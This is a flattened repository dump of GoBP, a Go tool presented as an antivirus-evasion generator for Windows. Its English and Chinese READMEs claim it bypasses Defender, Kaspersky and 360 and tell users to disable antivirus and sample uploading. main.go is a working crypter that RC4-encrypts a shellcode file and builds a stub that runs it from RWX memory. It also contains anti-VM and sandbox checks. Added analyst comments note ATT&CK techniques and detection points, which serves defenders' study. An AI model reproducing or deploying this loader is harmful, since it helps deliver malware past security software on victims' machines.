├── go.mod ├── Tool └── go-strip.exe ├── images ├── Demo1.png ├── CNdemo1.png ├── CNdemo2.jpg └── payload.png ├── readme_zh-CN.md ├── README.md └── main.go /go.mod: -------------------------------------------------------------------------------- 1 | module GoBP 2 | 3 | go 1.16 4 | -------------------------------------------------------------------------------- /Tool/go-strip.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awsaaaq/GoBP/HEAD/Tool/go-strip.exe -------------------------------------------------------------------------------- /images/Demo1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awsaaaq/GoBP/HEAD/images/Demo1.png -------------------------------------------------------------------------------- /images/CNdemo1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awsaaaq/GoBP/HEAD/images/CNdemo1.png -------------------------------------------------------------------------------- /images/CNdemo2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awsaaaq/GoBP/HEAD/images/CNdemo2.jpg -------------------------------------------------------------------------------- /images/payload.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awsaaaq/GoBP/HEAD/images/payload.png -------------------------------------------------------------------------------- /readme_zh-CN.md: -------------------------------------------------------------------------------- 1 | [English](./readme.md) 2 | 3 | # GoBP 4 | 免杀工具 Go语言编写 5 | - 免杀生成工具 6 | - 语言:Golang 7 | - 平台:Windows 8 | - 目前免杀杀软 9 | - Windows defender 10 | - 卡巴斯基 11 | 12 | 13 | # 使用方法 14 | 15 | ` 16 | git clone https://github.com/awsaaaq/GoBP.git 17 | ` 18 | 19 | 将payload.bin 放置在和 
main.go同目录文件夹中 20 | 21 | ` 22 | go build main.go 23 | ` 24 | 25 | 执行main.exe 26 | ![image](images/mainexe.png) 27 | 28 | 生成一个GoBP.exe 29 | Generate an execute GoBP.exe 30 | 31 | ![image](/images/payload.png) 32 | 33 | # 注意事项 34 | 在执行main.exe前关闭杀软! 35 | 36 | 关闭杀软自动上传功能! 37 | 38 | # 示例 39 | ## defender 免杀 40 | 41 | ![image](/images/Demo1.png) 42 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | [中文](./readme_zh-CN.md) 2 | # Update 3 | Version 2.0 4 | Just offer main.exe 5 | ## What's Update 6 | - Random way to generate bypass antiviru payload 7 | - Add antiSanbox 8 | - Add antiVM 9 | - Bypass Windows Defender 10 | - Bypass Kaspersky 11 | - Bypass 360 12 | ... 13 | ## Notes 14 | Please **Turn off** Antivirus software before execute main.exe! 15 | 16 | **Close** AntiVirus AutoUpload func! 17 | 18 | ## Usages 19 | execute command as followed in current dir: 20 | 21 | ``` 22 | go get github.com/lxn/win 23 | go get golang.org/x/sys/windows 24 | ``` 25 | 26 | Put payload.bin in main.exe's directory 27 | 28 | Execute main.exe 29 | 30 | Generate an execute GoBP.exe and Gostrip.exe 31 | 32 | 33 | # GoBP 34 | An Bypass Antivirus Tool by Golang in windows 35 | 36 | 37 | - Bypass Windows Defender 38 | - Bypass Kaspersky 39 | - Bypass 360 40 | - ... 
41 | # Usages 42 | ` 43 | git clone https://github.com/awsaaaq/GoBP.git 44 | ` 45 | 46 | 47 | Put payload.bin in main.go's directory 48 | 49 | 50 | 51 | ` 52 | go build main.go 53 | ` 54 | 55 | Execute main.exe 56 | 57 | Generate an execute GoBP.exe 58 | 59 | ![image](/images/payload.png) 60 | 61 | 62 | 63 | # Demo 64 | 65 | ![image](/images/Demo1.png) 66 | 67 | some China test result 68 | 69 | ![image](/images/CNdemo1.png) 70 | 71 | ![image](/images/CNdemo2.jpg) 72 | -------------------------------------------------------------------------------- /main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "bytes" 5 | "crypto/rc4" 6 | "encoding/base64" 7 | "fmt" 8 | "io" 9 | "io/ioutil" 10 | "math/rand" 11 | "net" 12 | "os" 13 | "os/exec" 14 | "strings" 15 | "syscall" 16 | "time" 17 | "unsafe" 18 | ) 19 | 20 | const Version = "1.1" 21 | const Banner = ` 22 | 23 | ____ ____ ____ 24 | / ___| ___ | __ )| _ \ 25 | | | _ / _ \| _ \| |_) | 26 | | |_| | (_) | |_) | __/ 27 | \____|\___/|____/|_| 28 | 29 | 30 | Bypass by Go 31 | Author:AntiFire 32 | ` 33 | /* ShowBanner prints the Banner constant to stdout. Banner is passed as the format string of fmt.Printf, so a percent sign added to it later would be parsed as a formatting verb. */ 34 | func ShowBanner() { 35 | 36 | fmt.Printf(Banner) 37 | 38 | } 39 | /* Delay sleeps for 10 seconds and returns 1 when the measured elapsed time is at least 10 seconds, otherwise 0; the error result is always nil. Analyst note: comparing requested against observed sleep time is a time-based sandbox check (MITRE ATT&CK T1497.003). Nothing visible in this file calls it, and the generated template only carries a commented-out Delay() call. */ 40 | func Delay() (int, error) { 41 | startTime := time.Now() 42 | time.Sleep(10 * time.Second) 43 | endTime := time.Now() 44 | sleepTime := endTime.Sub(startTime) 45 | if sleepTime >= time.Duration(10*time.Second) { 46 | return 1, nil 47 | } else { 48 | return 0, nil 49 | } 50 | } 51 | /* Win32 entry points resolved by name when the package initialises; MustLoadDLL and MustFindProc panic if a lookup fails. Analyst note: the API names are string literals both here and in the generated template, so they are candidate static indicators - verify against a built sample, since the post-processing step may alter what survives in the binary. */ 52 | var ( 53 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 54 | ntdll = syscall.MustLoadDLL("ntdll.dll") 55 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 56 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 57 | ) 58 | /* Flags passed to VirtualAlloc: commit and reserve in one call, with read/write/execute page protection. Analyst note: a private PAGE_EXECUTE_READWRITE region is a standard target of memory scanners and EDR allocation telemetry. */ 59 | const ( 60 | MEM_COMMIT = 0x1000 61 | MEM_RESERVE = 0x2000 62 | PAGE_EXECUTE_READWRITE = 0x40 63 | ) 64 | /* macList holds three-octet MAC address prefixes that ByMacAddress hands to ContainsPrefix. Presumably these are vendor prefixes of virtualisation products (the first four match the commonly cited VMware, VirtualBox and QEMU/KVM prefixes) - confirm the rest against an OUI registry. */ 65 | var macList = []string{"00:0c:29", "00:50:56", "08:00:27", "52:54:00 ", "00:21:F6", "00:14:4F", "00:0F:4B", "00:10:E0", "00:00:7D", "00:21:28", "00:01:5D", 
"00:21:F6", "00:A0:A4", 66 | "00:07:82", "00:03:BA", "08:00:20", "2C:C2:60", "00:10:4F", "00:0F:4B", "00:13:97", "00:20:F2", "00:14:4F"} 67 | /* getMacAddr returns the non-empty hardware addresses of the local network interfaces as strings. The error from net.Interfaces is discarded, so a failure yields a nil slice. */ 68 | func getMacAddr() []string { 69 | ifas, _ := net.Interfaces() 70 | 71 | var as []string 72 | for _, ifa := range ifas { 73 | a := ifa.HardwareAddr.String() 74 | if a != "" { 75 | as = append(as, a) 76 | } 77 | } 78 | return as 79 | } 80 | /* ByMacAddress reports the result of ContainsPrefix for macList and the first address returned by getMacAddr. It indexes element 0 without a length check, so it panics when getMacAddr returns nothing. Analyst note: a MAC-prefix lookup is a virtual-machine check (MITRE ATT&CK T1497.001); nothing visible in this file calls it. */ 81 | func ByMacAddress() bool { 82 | return ContainsPrefix(macList, getMacAddr()[0]) 83 | 84 | } /* ContainsPrefix returns whether macAdress starts with the first element of s: the return statement sits inside the loop body, so later elements are never compared. It returns false for an empty s. */ 85 | func ContainsPrefix(s []string, macAdress string) bool { 86 | for _, v := range s { 87 | return strings.HasPrefix(macAdress, v) 88 | } 89 | 90 | return false 91 | } /* read returns the contents of file. A read error is printed and otherwise ignored, so the caller receives whatever ReadFile returned alongside the error. */ 92 | func read(file string) []byte { 93 | data, err := ioutil.ReadFile(file) 94 | if err != nil { 95 | fmt.Print(err) 96 | } 97 | return data 98 | } 99 | /* randomInt returns a pseudo-random int in the half-open range [min, max) using math/rand. rand.Intn panics when max-min is not positive. */ 100 | func randomInt(min, max int) int { 101 | return min + rand.Intn(max-min) 102 | } 103 | /* genGoExe shells out through cmd.exe to run go mod init and go build (with -ldflags -s -w) inside GoBPTemp, copies GOrun.exe to GoBP.exe in the parent directory, deletes GoBPTemp, then runs go-strip.exe from the Tool directory over GoBP.exe. The errors from os.RemoveAll and from the go-strip command are ignored, and time.Sleep(5) waits 5 nanoseconds because the argument is a bare Duration. Analyst note: Tool/go-strip.exe is a prebuilt binary shipped in the repository with no source or hash on this page, and the README asks the operator to turn antivirus off before running the builder, so the builder is itself unverified code for whoever executes it. Build artefacts to look for on disk: the GoBPTemp directory, GOrun.go, GOrun.exe and GoBP.exe. */ 104 | func genGoExe() { 105 | cmd := exec.Command("cmd.exe", "/c", `start go mod init main`) 106 | cmd.Dir = "GoBPTemp" 107 | 108 | if err := cmd.Run(); err != nil { 109 | fmt.Println("No Go Env") 110 | return 111 | } 112 | 113 | cmd2 := exec.Command("cmd.exe", "/c", "start", "go", "build", "-ldflags", "-s -w", "GOrun.go") 114 | var stderr2 bytes.Buffer 115 | cmd2.Stderr = &stderr2 116 | cmd2.Dir = "GoBPTemp" 117 | if err := cmd2.Run(); err != nil { 118 | fmt.Println(stderr2.String()) 119 | return 120 | } 121 | 122 | cmd3 := exec.Command("cmd.exe", "/c", "copy .\\GOrun.exe .\\..\\GoBP.exe && exit") 123 | var stderr3 bytes.Buffer 124 | cmd3.Stderr = &stderr3 125 | cmd3.Dir = "GoBPTemp" 126 | if err := cmd3.Run(); err != nil { 127 | fmt.Println(stderr3.String()) 128 | return 129 | } 130 | os.RemoveAll("./GoBPTemp") 131 | 132 | cmd_go_strip := exec.Command("cmd.exe", "/c", "go-strip.exe -f ..\\GoBP.exe -a -output ..\\GoBP.exe") 133 | 134 | cmd_go_strip.Dir = "Tool" 135 | cmd_go_strip.Run() 136 | time.Sleep(5) 137 | 138 | } /* randomString reseeds math/rand from the current time and returns len bytes, each drawn from randomInt(65, 90), that is the uppercase letters A through Y. Analyst note: math/rand is not a cryptographic generator, and this function is what produces the RC4 key. */ 139 | func randomString(len int) string { 140 | 
rand.Seed(time.Now().UnixNano()) 141 | bytes := make([]byte, len) 142 | for i := 0; i < len; i++ { 143 | bytes[i] = byte(randomInt(65, 90)) 144 | } 145 | return string(bytes) 146 | } 147 | /* key is the RC4 key: five uppercase letters chosen once at package initialisation. Analyst note: main writes this key in cleartext into the generated source directly after the base64 blob, so key and ciphertext travel together in every generated stub and the embedded payload can be recovered by static analysis (MITRE ATT&CK T1027 covers this kind of payload obfuscation). */ 148 | var key string = randomString(5) 149 | /* enc RC4-encrypts src with key and returns the ciphertext encoded with the standard base64 alphabet. The error from rc4.NewCipher is discarded. */ 150 | func enc(src string) string { 151 | shellcode := []byte(src) 152 | enc_shellcode := make([]byte, len(shellcode)) 153 | 154 | cipher1, _ := rc4.NewCipher([]byte(key)) 155 | cipher1.XORKeyStream(enc_shellcode, shellcode) 156 | 157 | base64Rc4_shellcode := base64.StdEncoding.EncodeToString(enc_shellcode) 158 | return base64Rc4_shellcode 159 | 160 | } 161 | /* runshellcode copies charcode into a newly allocated read/write/execute region, zeroes the source slice, and transfers control to that region through syscall.Syscall; it exits the process with status 1 if VirtualAlloc returns 0. The RtlMoveMemory result is assigned but never checked, and taking the address of element 0 panics on an empty slice. Analyst note: main never calls this copy - the one that runs is the duplicate embedded in Gocode1. Allocate RWX, copy, jump is a well-known in-process loader sequence; the detection opportunities are the RWX private allocation and execution from memory that is not backed by an image file. */ 162 | func runshellcode(charcode []byte) { 163 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 164 | if addr == 0 { 165 | fmt.Println("Can't call VirtualAlloc") 166 | fmt.Println(err.Error()) 167 | os.Exit(1) 168 | 169 | } 170 | 171 | _, _, err = RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&charcode[0])), uintptr(len(charcode))) 172 | 173 | for j := 0; j < len(charcode); j++ { 174 | charcode[j] = 0 175 | } 176 | 177 | syscall.Syscall(addr, 0, 0, 0, 0) 178 | 179 | } 180 | /* dec reverses enc: it base64-decodes src and RC4-decrypts the result with key. Both the decode error and the rc4.NewCipher error are discarded. It is not called in this file; the generated stub carries its own copy. */ 181 | func dec(src string) []byte { 182 | debase64_data, _ := base64.StdEncoding.DecodeString(src) 183 | 184 | dec_shellcode := make([]byte, len(debase64_data)) 185 | cipher2, _ := rc4.NewCipher([]byte(key)) 186 | cipher2.XORKeyStream(dec_shellcode, debase64_data) 187 | return dec_shellcode 188 | 189 | } 190 | /* Gocode1, codeKey and Gocode2 are the three fragments of Go source that main concatenates around the encrypted blob and the key to form GoBPTemp/GOrun.go. Gocode1 declares the loader (imports, API lookups, runshellcode, dec) and ends inside the opening quote of the enc_data literal. */ 191 | var Gocode1 = ` 192 | package main 193 | 194 | import ( 195 | "crypto/rc4" 196 | "encoding/base64" 197 | "syscall" 198 | "unsafe" 199 | ) 200 | 201 | var ( 202 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 203 | ntdll = syscall.MustLoadDLL("ntdll.dll") 204 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 205 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 206 | ) 207 | 208 | const ( 209 | MEM_COMMIT = 0x1000 210 | MEM_RESERVE = 0x2000 211 | PAGE_EXECUTE_READWRITE = 0x40 212 | ) 213 | 214 | 215 | func 
runshellcode(charcode []byte) { 216 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 217 | 218 | 219 | 220 | //Delay() 221 | _, _, _ = RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&charcode[0])), uintptr(len(charcode))) 222 | 223 | for j := 0; j < len(charcode); j++ { 224 | charcode[j] = 0 225 | } 226 | //Delay() 227 | 228 | syscall.Syscall(addr, 0, 0, 0, 0) 229 | } 230 | 231 | func dec(src string) []byte { 232 | debase64_data, _ := base64.StdEncoding.DecodeString(src) 233 | 234 | dec_shellcode := make([]byte, len(debase64_data)) 235 | cipher2, _ := rc4.NewCipher([]byte(key)) 236 | cipher2.XORKeyStream(dec_shellcode, debase64_data) 237 | return dec_shellcode 238 | 239 | 240 | } 241 | 242 | 243 | 244 | var enc_data = "` 245 | /* codeKey closes the enc_data string literal and opens the key literal in the generated file. */ 246 | var codeKey = `" 247 | var key string = "` 248 | /* Gocode2 closes the key literal and supplies the main function of the generated program, which decrypts enc_data with dec and passes the result to runshellcode. */ 249 | var Gocode2 = `" 250 | 251 | func main() { 252 | shellcodefin := dec(enc_data) 253 | runshellcode(shellcodefin) 254 | } 255 | ` 256 | /* main is the builder entry point: it prints the banner, reads ./payload.bin, encrypts it with enc, writes the assembled source to GoBPTemp/GOrun.go and calls genGoExe. The os.Mkdir and io.WriteString errors are ignored, the file is closed twice (once explicitly, once deferred), and when os.OpenFile fails the function only prints a message and carries on with the returned file value. Analyst note: the blob and the key are spliced into Go string literals without escaping; base64 output and the letters A through Y contain no double quote, so the generated literals stay well formed. */ 257 | func main() { 258 | ShowBanner() 259 | enc_data := enc(string(read("./payload.bin"))) 260 | codeText := Gocode1 + enc_data + codeKey + key + Gocode2 261 | 262 | //fmt.Print(codeText) 263 | os.Mkdir("GoBPTemp", 0777) 264 | f, err := os.OpenFile("GoBPTemp/GOrun.go", os.O_WRONLY|os.O_CREATE, 0600) 265 | 266 | if err != nil { 267 | fmt.Print("Create folder failed") 268 | } 269 | defer f.Close() 270 | io.WriteString(f, codeText) 271 | f.Close() 272 | // Generate Go payload 273 | genGoExe() 274 | fmt.Print("GoBP Generate!") 275 | 276 | } 277 | --------------------------------------------------------------------------------